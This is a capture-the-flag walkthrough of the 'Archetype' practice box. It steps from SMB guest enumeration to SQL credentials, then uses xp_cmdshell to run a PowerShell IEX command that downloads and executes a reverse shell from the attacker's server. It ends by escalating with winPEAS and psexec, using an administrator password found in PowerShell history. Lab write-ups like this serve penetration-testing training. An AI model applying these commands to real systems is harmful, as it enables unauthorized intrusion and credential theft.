This is a walkthrough of the “Archetype” box found in tier 2 of the starting point section. It will not contain flag spoilers but will guide you through the steps taken to obtain the flags.
Difficulty: Very Easy
§ Enumeration
The enumeration phase aims to gather as much information about the target that would help us potentially gain initial access to the target system/systems.
Starting off, we are going to run a port scan with Nmap to see what ports are currently exposed by the target system:
| Command used: nmap -A -T4 -p- <ip-address>
We can see multiple ports from this Nmap scan, but the most important to us for this lab is going to be ports 445 (SMB) and 1433 (SQL).
We are first going to investigate port 445 with a tool called smbclient to try and list the SMB shares. In the Nmap scan, we can see that guest authentication is allowed.
| Command used: smbclient -L \\\\<ip-address>\\
We are asked for a password, but simply pressing Enter allows us to log in as a guest user. We can see a total of 4 (four) shares, 3 (three) of the shares are hidden shares indicated by the dollar sign, and they also typically require authentication for access.
However, we have one share called “backups” which is the odd one out missing a dollar sign. This does not mean it is 100% accessible, it could still be behind authentication, but let’s try accessing it anyway.
| Command used: smbclient \\\\<ip-address>\\backups
We can access the “backups” share as a guest user, and we can also see that we have one file inside of this SMB share which at first glance looks like a config file of some sort. Let’s grab it and view its content!
When viewing the config file we found in the “backups” SMB share we can see a set of credentials, specifically, the credentials for a potential SQL service account.
§ Initial Access
We have now enumerated the SMB port from our initial Nmap scan, and from that, we found a set of SQL service credentials which leads us into the initial access phase.
The initial access phase is exactly what it suggests, we are simply gaining a foothold inside the target system, does not matter what our privileges are as long as we can get inside the system.
Let’s get into it! We are going to use a sub-tool of the impacket tool called impacket-mssqlclient, this tool lets us establish a connection with a Microsoft SQL server instance and perform various tasks, one task being, gaining unauthorized access to the system by establishing a reverse shell.
| Command used: impacket-mssqlclient username@ip -windows-auth
We have now established a connection to the SQL instance. The cool thing about impacket-mssqlclient is that we can execute shell commands with the xp_cmdshell option, we first need to enable it:
As we can see, after enabling it we can execute shell commands such as “whoami” just to confirm.
But this also means that we can establish a reverse shell connection by downloading a reverse shell onto the target system by using our own Python web server, and then using that reverse shell to connect to our netcat listener.
Starting by finding a reverse shell we can use, I ended up using this one:
• Reverse shell
And then I edited it to include my IP address and the port I want to use to establish the connection.
We are now going to start our netcat listener on our port of choice and also start the Python web server in the same directory where we have our reverse shell:
We are now ready to download our reverse shell on the target system, going back to our SQL connection we are going to use the following command to first download the reverse shell and then execute the script:
| Command used: xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString(\”http://ip:port/revshell.ps1\”)
We are currently logged in as a normal user without sufficient privileges, so we need to try to find a way of escalating our privileges to an administrator user.
§ Escalating Privileges
Now that we have gained initial access to the target system, the next step would be to find a way to escalate our privileges to become a more powerful user. For this, we are going to use a really common tool for Windows privilege escalation called winPEAS.
We are going to download the winPEASx64.exe file from this GitHub repository and place it inside the same folder in which we currently have a Python web server running.
After downloading winPEAS we are going to download that executable from our Python HTTP server onto the target system in a directory that we are allowed to read and write to.
| Command used: Invoke-WebRequest -Uri “http://ip:port/winPEASx64.exe” -OutFile “winPEASx64.exe”
Now that we have downloaded winPEAS on the target system it's time to run it and see if we can find anything interesting!
| Command used: .\winPEASx64.exe
Going through the winPEAS result we find this PowerShell history file which winPEAS has marked in red which means that it “Indicates a special privilege over an object or something is misconfigured”. This file has the potential of storing plain text passwords if entered as part of a command.
And we can indeed confirm that is exactly what has happened here, the administrator has used their credentials as part of a command and forgotten to clear the PowerShell history file.
Now that we know the administrator credentials we can simply use a tool called psexec to log in as the administrator and establish a connection with the target system.
| Command used: psexec.py administrator@ip
We have now “rooted” the box meaning we have gained access to the administrator account.
§ Flags
Now that we have gained administrator access we are going to grab both flags for this box:
Thank you for reading, hope this helped you in some way!
